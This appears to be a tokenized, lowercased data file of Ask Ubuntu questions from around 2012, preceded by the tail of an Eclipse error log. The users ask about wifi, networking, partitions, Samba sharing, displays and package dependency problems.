org.eclipse.jetty.util 2 0 2012-10-10 16:06:30.440 ! message missing imported package javax.servlet_2.6.0 . ! subentry 2 org.eclipse.jetty.util 2 0 2012-10-10 16:06:30.440 ! message missing imported package javax.servlet.http_2.6.0 . ! subentry 2 org.eclipse.jetty.util 2 0 2012-10-10 16:06:30.440 ! message missing optionally imported package org.slf4j_ [ 1.5.0,2.0.0 ) . ! subentry 2 org.eclipse.jetty.util 2 0 2012-10-10 16:06:30.440 ! message missing optionally imported package org.slf4j.helpers_ [ 1.6.0,2.0.0 ) . ! subentry 2 org.eclipse.jetty.util 2 0 2012-10-10 16:06:30.440 ! message missing optionally imported package org.slf4j.impl_ [ 1.5.0,2.0.0 ) . ! subentry 2 org.eclipse.jetty.util 2 0 2012-10-10 16:06:30.440 ! message missing optionally imported package org.slf4j.spi_ [ 1.6.0,2.0.0 ) . ! entry org.eclipse.osgi 4 0 2012-10-10 16:06:30.441 ! message application error ! stack 1 java.lang.arrayindexoutofboundsexception : 0 at org.eclipse.e4.core.internal.di.constructorrequestor.calcdependentobjects ( constructorrequestor.java:79 ) at org.eclipse.e4.core.internal.di.requestor.getdependentobjects ( requestor.java:143 ) at org.eclipse.e4.core.internal.di.injectorimpl.resolveargs ( injectorimpl.java:408 ) at org.eclipse.e4.core.internal.di.injectorimpl.internalmake ( injectorimpl.java:312 ) at org.eclipse.e4.core.internal.di.injectorimpl.make ( injectorimpl.java:240 ) at org.eclipse.e4.core.contexts.contextinjectionfactory.make ( contextinjectionfactory.java:161 ) at org.eclipse.e4.ui.internal.workbench.swt.e4application.createdefaultheadlesscontext ( e4application.java:420 ) at org.eclipse.e4.ui.internal.workbench.swt.e4application.createdefaultcontext ( e4application.java:434 ) at org.eclipse.e4.ui.internal.workbench.swt.e4application.createe4workbench ( e4application.java:182 ) at org.eclipse.ui.internal.workbench $ 5.run ( workbench.java:557 ) at org.eclipse.core.databinding.observable.realm.runwithdefault ( realm.java:332 ) at org.eclipse.ui.internal.workbench.createandrunworkbench ( workbench.java:543 ) at org.eclipse.ui.platformui.createandrunworkbench ( platformui.java:149 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:124 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:353 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:180 ) at java.lang.reflect.method.invoke ( libgcj.so.12 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:629 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:584 ) at org.eclipse.equinox.launcher.main.run ( main.java:1438 ) at org.eclipse.equinox.launcher.main.main ( main.java:1414 ) would you please help me with this ?
198607	set up wlan on a ubuntu desktop to connect with wireless device	i 'm using a desktop computer with ubuntu 12.04 os . this pc is connected to internet and a local network which is also connected by a wifi router . can i use this pc to connect to other wireless devices ( via the wifi router ) ? ? this is a bit tricky since it 's ubuntu could anyone help me with some hints ? ?
198608	how to connect to a remote desktop behind a router ?	here 's my setup : i have a laptop that i roam around everywhere with , and i have a desktop computer at home that is connected to the web using a router with nat . my objective here is to create an ssh server which i can use for the purpose of file storage/access as well as using it as a proxy server . however , the problem is that the desktop ( which i 'm using as the ssh server ) is on a router behind a nat . this means i ca n't connect to the server from outside my home network . i want to be able to connect directly to my desktop from an outside network using the laptop . here are the options i 've found on the web so far : teamviewer - i really do n't want to use this , i tried it and did n't like it one bit . configure port forwarding on the router - again , not an option since the router is actually operated by the isp and they wo n't let me reconfigure it . using a program called pwnat which i found here - this seems like the most viable of all my options , but i have n't been able to figure out how to get it to work . also , from the poor documentation , it seems to be quite a pain to use as well . reverse tunnel as show here - this can not work as i do n't have a `` middle '' computer is there some way i can make the connection through ssh from the laptop on a regular basis ? otherwise , is there some other alternative that will let me use the desktop as a file server and proxy ? edit : there was another alternative provided below by obsessivefoss using the gogo6 client - seemed like a good option , but i could n't make it work . possibly because my isp/router does n't appear to support ipv6 .
198612	my ethernet is not been detected in ubuntu 12.04	i 'm very new to ubuntu , all of a sudden my internet is not working in my ubuntu machine . but fortunately the internet is working in my windows machine . the ethernet cable is not even gets detected in my ubuntu machine . as a new user to ubuntu , this is really frustrating . are there any ways to use internet in ubuntu ? edit : doing ifconfig eth0 : eth0 link encap : ethernet hwaddr 6c : f0:49 : c4:7f:2d up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:42 doing lspci , gives me : 00:00.0 host bridge : intel corporation 4 series chipset dram controller ( rev 03 ) 00:02.0 vga compatible controller : intel corporation 4 series chipset integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 01 ) 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 01 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gb/gr ( ich7 family ) lpc interface bridge ( rev 01 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 01 ) 00:1f.2 ide interface : intel corporation n10/ich7 family sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 01 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 02 ) in my windows machine i have the config like this : i 'm new to ubuntu , i need some help in setting up my internet connection ! ! thanks in advance .
198617	how to recover missing files on shotwell 0.12.3-0ubuntu0.1 ?	i recently `` imported '' some pictures from a memory card to shotwell , but apparently i did not import them correctly , now they all appear in the missing files . the pictures are no longer on the memory card i imported them from . is there a way i can recover these pictures ?
198620	ubuntu 12.04.1 setup does n't detect windows 7 partition	i 'm not really that of a linux pro , more of a noob . but i can handle console operations . well , this is my system : asus zenbook prime ux31a 256 gb adata mx11 ssd intel core i5-3317u ( ivy-bridge ) i have a fresh installation of windows 7 ultimate ( not activated ) on a 90 gb ntfs partition on my ssd , the rest is unassigned . i want to install ubuntu 12.04.1 from an usb stick ( no cd-drive ... ) created with universal usb installer 1.9.1.1 . however i 'm not givven the option 'install alongside windows ' , and when i choose 'other ' it shows that 256 gb of 256 gb are unassigned ( free ) memory . os-prober gave me : /dev/sda1/ : windows 7 ( loader ) : windows : chain i also tried : sudo dmraid -re and : sudo apt-get remove dmraid with no success ... how can i install ubuntu alongside windows ? thanks very much in advance !
198624	changing from wubi to complete install ?	so i have been successfully running ubuntu along side windows with the wubi installation but keep finding myself running out of space and wish to get rid of windows and solely go with ubuntu . normally i would go straight ahead and use start up disk creator though at the present time i dont have any discs available and only have 2gb flash disc drives or a 120gb sata hard drive . how do i go about this ?
198626	how to start new applications in a new workspace ( gnomeshell ) ?	what i really like about gnomeshell is that the user can easily place different applications in different workspaces , thus giving each application the entire desktop . the pain about that is that the user has to manually switch the applications between workspaces . there is an extension that forces specific applications to be opened in predesignated workspaces ; ie : firefox would start at workspace 4 , banshee at workspace 3 , etc . but the drawback about that is that if the user is working in workspace one and wants to start firefox , he/she would have 2 empty workspaces between 1 and 4 . not only that but also programs that are n't configured would still open in the current workspace . is there an extension or a script that forces new applications to start in the last open workspace ( the empty one ) , no matter how many workspaces are open ?
198627	how to comment out code in a file via terminal	i am following this tutorial to make my android an external monitor for my ubuntu 12.04 computer . how do i do the following : edit your vnc session file $ vi ~/.vnc/xstartup comment out everything and put this at the end gnome-session &
198630	folder sharing ubuntu 12 - revoke permissions	i tried setting up a share on my ubuntu 12.04 machine to my win7 machine . i right clicked on a folder in ubuntu and chose the sharing options and gave it read and write permissions too . now the problem is , i chose my videos folder to be shared , but when i access it on my windows machine , i can see my whole system ! to top it of , it has write permissions too . how do i revoke this and share only that one folder ? i deleted all the shares and tried smbclient -l localhost and i got domain= [ workgroup ] os= [ unix ] server= [ samba 3.6.3 ] sharename type comment -- -- -- -- - -- -- -- -- -- - ipc $ ipc ipc service ( xyz server ( samba , ubuntu ) ) print $ disk printer drivers domain= [ workgroup ] os= [ unix ] server= [ samba 3.6.3 ] server comment -- -- -- -- - -- -- -- - xyz xyz server ( samba , ubuntu ) abpc workgroup master -- -- -- -- - -- -- -- - workgroup xyz which lists no shared folders , but i can still access them through my windows machine . other things i tried net usershare list ( lists nothing ) ls -l /var/lib/samba/usershares ( returns total 0 ) smbstatus -- shares service pid machine connected at -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - ipc $ 8888 xyz wed oct 10 21:56:22 2012 videos 8625 abpc wed oct 10 21:54:22 2012 ipc $ 8767 xyz wed oct 10 21:56:17 2012 i 'm at my wits end . someone please help me .
198632	getting the following error in installing qt creator through software center	getting the following error in installing qt creator through software center . the following packages have unmet dependencies : qtcreator : depends : libqt4-help ( > = 4:4.7.1 ) but 4:4.8.1-0ubuntu4 is to be installed depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu10.2 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : libqt4-declarative ( > = 4:4.7.4 ) but 4:4.8.1-0ubuntu4.2 is to be installed depends : libqt4-designer ( > = 4:4.7.1 ) but 4:4.8.1-0ubuntu4 is to be installed depends : libqt4-network ( > = 4:4.7.1 ) but 4:4.8.1-0ubuntu4.2 is to be installed depends : libqt4-script ( > = 4:4.7.1 ) but 4:4.8.1-0ubuntu4.2 is to be installed depends : libqt4-sql ( > = 4:4.7.1 ) but 4:4.8.1-0ubuntu4.2 is to be installed depends : libqt4-svg ( > = 4:4.7.1 ) but 4:4.8.1-0ubuntu4.2 is to be installed depends : libqt4-xml ( > = 4:4.7.1 ) but 4:4.8.1-0ubuntu4.2 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.1-0ubuntu4.2 is to be installed depends : libqtgui4 ( > = 4:4.8.0 ) but 4:4.8.1-0ubuntu4.2 is to be installed depends : libstdc++6 ( > = 4.4.0 ) but 4.6.3-1ubuntu5 is to be installed
198638	startup script sometimes fails - rc.local virtual machine	i 've added simple line : python < path-to-my-script > & to /etc/rc.local , but i 've noticed that after migration from one host to the other one , the script sometimes fails . i 'm using kvm , vm 's are under ubuntu 12.04 32-bits . host 's have ubuntu 12.04 64-bits and i 'm using live migration ( private cloud built with openstack ) . i do n't know it 's kvm/libvirt 's fault or maybe i 'm doing something wrong on ubuntu or maybe it 's cloud software 's fault ? could it be rc.local fault ? is there something what i should to know , when i 'm using rc.local and it may be a cause of this behaviour ?
198639	can not reinstall mysql in 11.10 - error : there 's not enough space in /var/lib/mysql/	i 've tried it all ( removing all the packages associated with mysql ) but keep getting stuff like this : preconfiguring packages ... ( reading database ... 142196 files and directories currently installed . ) unpacking mysql-server-5.1 ( from ... /mysql-server-5.1_5.1.63-0ubuntu0.11.10.1_amd64.deb ) ... error : there 's not enough space in /var/lib/mysql/ dpkg : error processing /var/cache/apt/archives/mysql-server-5.1_5.1.63-0ubuntu0.11.10.1_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/mysql-server-5.1_5.1.63-0ubuntu0.11.10.1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) here is my drive space map . root @ kyle : / # df filesystem 1k-blocks used available use % mounted on /dev/mapper/kyle-root 59361428 59021768 0 100 % / udev 1014052 8 1014044 1 % /dev tmpfs 409304 1476 407828 1 % /run none 5120 0 5120 0 % /run/lock none 1023256 0 1023256 0 % /run/shm /dev/sda1 233191 46888 173862 22 % /boot /dev/md0 1922858288 1048513192 776669500 58 % /media/array the root volume actually only has about 10 gigabytes in use on the hard drive ( which has a 60 gig partition ) . /dev/md0 is a 2 tb raid array .
198645	not able to view a website in ubuntu ?	i am not able to view a particular website in ubuntu where as the same is getting viewed in windows . can anyone suggest or provide me a fix to solve this issue ? ? website which is not getting viewed in ubuntu : http : //www.grandsarovar.com/360/resturant.html getting viewed in windows : view in ubuntu :
198648	best video recording & mixing software for ubuntu	i 'm searching for a quality software for recording video streams and mixing 3 cameras ' streams and photos . i need it also for online streaming on a website . it could be a commercial software , does n't have to be open source or free . i just do n't have a clue if there is something like this . thanks in advance . p.s . it 's for ubuntu 12.04 p.s.s . maybe my definition is not correct or full , so i have to add - i need the program for live broadcast and recording on the computer at the same time .
198656	slow wifi on ubuntu 12.04 wifi driver ath9k	for the last couple of days my wifi connection is extremely slow . i am pretty sure that it is caused by the driver . can this be improved ? lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' mywifi '' mode : managed frequency:2.437 ghz access point : 00:18:63 : fe:7a : c7 bit rate=58.5 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=48/70 signal level=-62 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:6960 missed beacon:0 eth0 no wireless extensions . sudo lshw -class network *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 74 : f0:6d:34 : c2:4e width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-31-generic-pae firmware=n/a ip=192.168.1.2 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : d7400000-d740ffff *-network description : ethernet interface product : ar8131 gigabit ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth0 version : c0 serial : 48:9b:38:48 : f3 : ed capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi firmware=n/a latency=0 link=no multicast=yes port=twisted pair resources : irq:51 memory : d3800000-d383ffff ioport:8000 ( size=128 ) lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 003 : id 04f2 : b1bb chicony electronics co. , ltd bus 001 device 004 : id 0b05:1788 asustek computer , inc. lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 18 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 06 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 06 ) 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 425m ] ( rev a1 ) 03:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 04:00.0 usb controller : fresco logic device 1400 ( rev 01 ) 06:00.0 ethernet controller : atheros communications inc. ar8131 gigabit ethernet ( rev c0 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 05 ) rfkill list all 0 : hci0 : bluetooth soft blocked : yes hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no
198658	bad hd video deinterlacing processing	i have ubuntu 12.04 32-bit with unity . my system configuration is : cpu : core 2 quad q6600 ( 2.4 ghz ) ram : 8192 mb ddr2 kingston video : palit geforce gtx 260 216 sp , and my screen resolution is 1680x1050 . i also have window 7 ulitimate installed , and i can see the same files in media player classic without any horizontal lines . i 've installed vdpau driver , nvidia drivers 304.51 , and mplayer 2 ( within smplayer ) . i 've disabled `` sync to vblank '' option in ccsm ( because in other way , by default , mplayer process use about 50-60 percents of my processor load ) , tried to swich between different deinterlace options in smplayer , used `` -vc ffh264vdpau , ffmpeg12vdpau '' ( without quotes ) parameters for mplayer , switched to `` ubuntu 2d '' , but , finally , have no results . any suggestions ? how must i to set up mplayer ? i also attach screenshots of my smplayer 's options : full size
198660	ca n't see other computer on network	my friend and me are connected via lan router , and we both have ubuntu 12.04 . there is a problem with network . my friend can see my computer on network , but i ca n't see his computer . i can ping him and connect to phpmyadmin ( he has php server installed ) but i ca n't access files on his computer ? what seem to be a problem ?
198668	3 monitors , ubuntu 12.04 , gnome 3 , 2 nvidia cards , with xrandr or xinerama ?	ok . i have been banging my head against the wall for over a week now trying to get 3 monitors to work . i have : nvidia 8600 gt 512mb pciex16 nvidia gt 240 1gb pciex16 they are not running in sli ( obviously ) . i have tried to use everything from tutorials to a few templates , all the way up to nvidia-settings , etc etc etc.. from what i hear , xinerama doesnt like gnome 3 because of the compositing , although i have read a lot about using xrandr instead , and getting the compositing working , but alas , i can not . it always either crashes x and i have to replace the xorg.conf with my backup , or it defaults to the gnome-classic desktop , and on top of that , when it does default , it keeps adding more and more panels . basically , i want to be able to use all 3 monitors ( yes , just like in windows ) to drag and drop from different windows . i have xorg-edit , but i am still not too sure on how to set this up ? is there any way to : a > get compositing working with 3 monitors , 2 nvidia cards , xinerama , and gnome 3 ? or b > use twinview with 3 monitors ( i have heard it can be done by manually editing xorg.conf ) or c > set up xrandr to draw all 3 monitors with compositing . or d > use separate x for each monitor , and be able to use gnome with compositing , as well as drag between all 3 or e > anything . lol . i just want this to work . any help you can provide would be greatly appreciated . btw , i am running an ubuntu mini install with gnome . everything works great but this . i can run it fine with 2 monitors and compositing , but not with 3 . also , what is the best gui tool for editing xorg.conf ? im not finding anything that is up to date at all , and also is understandable by humans . haha . im actually an engineer by trade , and have been working with computers a long time , but this xorg.conf stuff is really confusing the crap out of me . lol thanks !
198669	can i install 10.04 after 12.04 ?	i have installed ubuntu 12.04 ( 32 bit ) on a laptop with windows 7 ( 32 bit ) : the bootloader is the grub version provided with ubuntu 12.04 . now i would also install ubuntu 10.04 ( 64 bit ) , without overwriting the bootloader installed with ubuntu 12.04 . obviously i would like the grub previously installed by ubuntu 12.04 can boot all operating systems installed ( windows 7 , ubuntu 10.04 and ubuntu 12.04 ) . could the bootloader installed by ubuntu 12.04 ( 32 bit ) start also ubuntu 10.04 ( 64 bit ) ? if i install ubuntu 10.04 unchecking the option to install grub , the previous version of grub should not grub would not be configured to start ubuntu 10.04 . what is the correct way to proceed ?
198670	is there any way to show amount of missed empathy messages in the launcher icon ?	i use empathy and i have a problem with notifications for non read messages . is there any way to show amount of missed messages at left panel icon , like thunderbird , skypewrapper , ... . and other applications . empathy is a default massager in ubuntu : ) , ... . i did not find any related settings in empathy preferences .
198675	dropbox add to computer menu in nautilus	i was wondering if there was any way to `` bookmark '' dropbox in nautilus on the left hand side ? would be useful to have . i tried searching but had no success , so i apologise in advanced if this has already been ask . thanks in advanced for all responses ! : d
198679	wakeonlan not working on asus m4a79xtd evo with kubuntu 12.04 64bit	i have been trying to setup wakeonlan on my desktop which uses an asus m3n72-d and is running kubuntu 12.04 64bit . i believe i have setup the bios correctly . i have enabled pme . i did n't find any other setting that mentioned wake on lan except eup which i have disabled ( it turns off wol in the s5 state ) . in my rc.config put : sudo ethtool -s eth0 wol g but that has n't resolved the problem . some things that might hint at a solution are that presently if i go into standby the computer will not come out of standby , and when i shutdown the computer the lights next the ethernet port always turn off . i also ran wireshark while the computer was running and saw that the magic packet is able to reach the desktop with the correct mac address . here is the results for ethtool eth0 settings for eth0 : supported ports : [ tp mii ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full advertised pause frame use : symmetric receive-only advertised auto-negotiation : yes link partner advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full link partner advertised pause frame use : symmetric link partner advertised auto-negotiation : yes speed : 1000mb/s duplex : full port : mii phyad : 0 transceiver : internal auto-negotiation : on supports wake-on : pumbg wake-on : g current message level : 0x00000033 ( 51 ) drv probe ifdown ifup link detected : yes is there anything else i can try to fix the problem ?
198682	ca n't adjust brightness on a sony vaio t13 ultrabook	i recently installed ubuntu 12.04 alongside windows 7 in a vaio t13 ultrabook . i can not use the the fn+f4 or fn+f5 to change the brightness . the bubble appears indicating that brightness is being changed but with no visual impact on the screen . i 've tried many solutions involving the manipulation of the /etc/default/grub file but none of them worked . whenever i tried this manipulation the screen still did n't change , however the bubble stopped functioning properly . this is not a problem of the fn shortcut . even when i try to change it in the brightness and lock on system settings , the bar does scroll but the screen remains unchanged . does any one has a way around this mystery ?
198683	screen flickering on dell xps when using mid-range brightness values	after a fresh install of ubuntu , i discovered the function keys for screen brightness control ( fn+f4 and fn+f5 in that case ) are not functioning . digging around here , i managed to get them to work by following a solution suggested on several posts , but alas — after applying it , a strange problem occurred : when setting the brightness level to any value other than minimum or maximum , the screen starts flickering back and forth from the selected level to full brightness , apparently due to dell 's power saver attempting to dim the screen to auto-adjust brightness levels . i looked up for a solution here on the site , and possibly everywhere , with no avail . also tried : to manually control the brightness by configuring the acpi level ( setting values by echo [ some_value ] | sudo tee /sys/class/backlight/ [ vendor ] _backlight/ [ some_key ] , without success . installing the intel graphics driver , thinking it 's missing . realized it 's installed out of the box by installing mesa utils . how to resolve this ? environment model : dell studio xps 13 os : windows 7 64bit / ubuntu 12.04 32bit ( dual boot ) graphics driver : intel hd 3000 ( sandybridge mobile x86/mmx/sse2 ) lshw -c display output : *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:47 memory : f0000000-f03fffff memory : e0000000-efffffff ioport:2000 ( size=64 )
198687	wireless connection by using command screen	i installed ubuntu 12.04 armhf to my beagleboard-xm and now trying to connect to a wireless network . first , i checked if i can search for available networks : ubuntu @ arm : ~ $ iwlist scan lo interface does n't support scanning . usb0 interface does n't support scanning . wlan0 scan completed : cell 01 - address : ea:7d : ef:60 : c9:0b channel:1 frequency:2.412 ghz ( channel 1 ) quality=70/70 signal level=-23 dbm encryption key : on essid : '' ghostrider '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : ad-hoc extra : tsf=000000005a1ab50e extra : last beacon : 6242ms ago ie : unknown : 000a67686f73747269646572 ie : unknown : 010882848b962430486c ie : unknown : 030101 ie : unknown : 06020000 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : unknown : 32040c121860 ie : unknown : 2d1a2c181bff00000000000000000000000000000000000000000000 ie : unknown : 3d16010800000000ff000000000000000000000000000000 ie : unknown : dd09001018020000000000 then i edited /etc/network/interfaces file to the following : root @ arm : /etc/wpa_supplicant # cat /etc/network/interfaces auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet dhcp # example to keep mac address between reboots # hwaddress ether de : ad : be : ef : ca : fe # wifi example auto wlan0 iface wlan0 inet dhcp wpa-ssid `` ghostrider '' wpa-psk `` b34d373eb2fb836a43b0afffe783c7d0af694724506c9e77b06d1021302905bf '' but i can not still connect to the wireless network : root @ arm : /etc/wpa_supplicant # iwconfig lo no wireless extensions . usb0 no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-asociated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on eth0 no wireless extensions . root @ arm : /etc/network # ifup wlan0 failed to bring up wlan0 . what is wrong ? should i change any other files also ? but i think it was enough . by the way if you are curious about where that wpa-psk came from : zero @ ghostrider : ~ $ wpa_passphrase ghostrider 34bddf67c2 network= { ssid= '' ghostrider '' # psk= '' 34bddf67c2 '' psk=b34d373eb2fb836a43b0afffe783c7d0af694724506c9e77b06d1021302905bf } i will appreciate any effort to help . regards , amadeus ps : also i tried to connect manually : root @ arm : /etc/network # iwconfig wlan0 essid ghostrider key s:34bddf67c2 but this did not solve my problem also . `root @ arm : /home/ubuntu # ifup wlan0 failed to bring up wlan0 . root @ arm : /home/ubuntu # tail -f /var/log/syslog dec 31 18:05:13 arm dhclient : no dhcpoffers received . dec 31 18:05:15 arm dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 9 dec 31 18:05:24 arm dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 15 dec 31 18:05:39 arm dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 12 dec 31 18:05:51 arm dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 7 dec 31 18:05:58 arm dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 9 dec 31 18:06:07 arm dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 20 dec 31 18:06:27 arm dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 18 dec 31 18:06:45 arm dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 8 dec 31 18:06:53 arm dhclient : no dhcpoffers received . properties of the network that i am trying to connect : `
198690	incorrect song length in banshee	i 've noticed that banshee displays incorrect length for some songs . for example , i have a song that 's only a few minutes long , but in the playlist it says that it 's 30:43 . everything plays just fine , so i guess it 's just incorrect metadata somwhere . how can i fix this ?
198691	fix overlapping partitions	i have problem with overlapping partitions . gparted shows me all my disk as unallocated area , output of fdisk below : alex @ alex-thinkpad-sl510 : ~ $ sudo fdisk -l /dev/sda disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xfb4b9b90 device boot start end blocks id system /dev/sda1 * 2048 2457599 1227776 7 hpfs/ntfs/exfat /dev/sda2 2457600 571351724 284447062+ 7 hpfs/ntfs/exfat /dev/sda3 571342846 604661759 16659457 5 extended /dev/sda4 604661760 625137663 10237952 7 hpfs/ntfs/exfat /dev/sda5 598650880 604661759 3005440 82 linux swap / solaris /dev/sda6 571342848 598650879 13654016 83 linux partition table entries are not in disk order do i understand correctly that overlapping partitions are sda2 and sda3 ( sda2 and sda6 overlaps too , because sda6 is the first chunk of sda3 , sda3 has type `` extended '' ) ? are sda2 and sda3 the cause of problem ? how can i fix it without deleting partitions ? my os is ubuntu 12.04 , 64 bit . thanks in advance .
198697	application trying to use the wrong shared library	i 'm having a problem with a program ( quartus ) running on my ubuntu machine . i 'm getting the following error . quartus : symbol lookup error : /usr/lib/i386-linux-gnu/libxi.so : undefined symbol : xesetwiretoeventcookie i have the correct libxi.so.6.0.0 file but no matter where i put it , the os wo n't use it unless i apt-get remove libxi-dev , but a lot of software uses this libxi . what i want to do is add some sort of exception to the dynamic linker so that quartus uses the libxi.so that it needs and everything else still uses the one in /usr/lib/i386-linux-gnu . thanks !
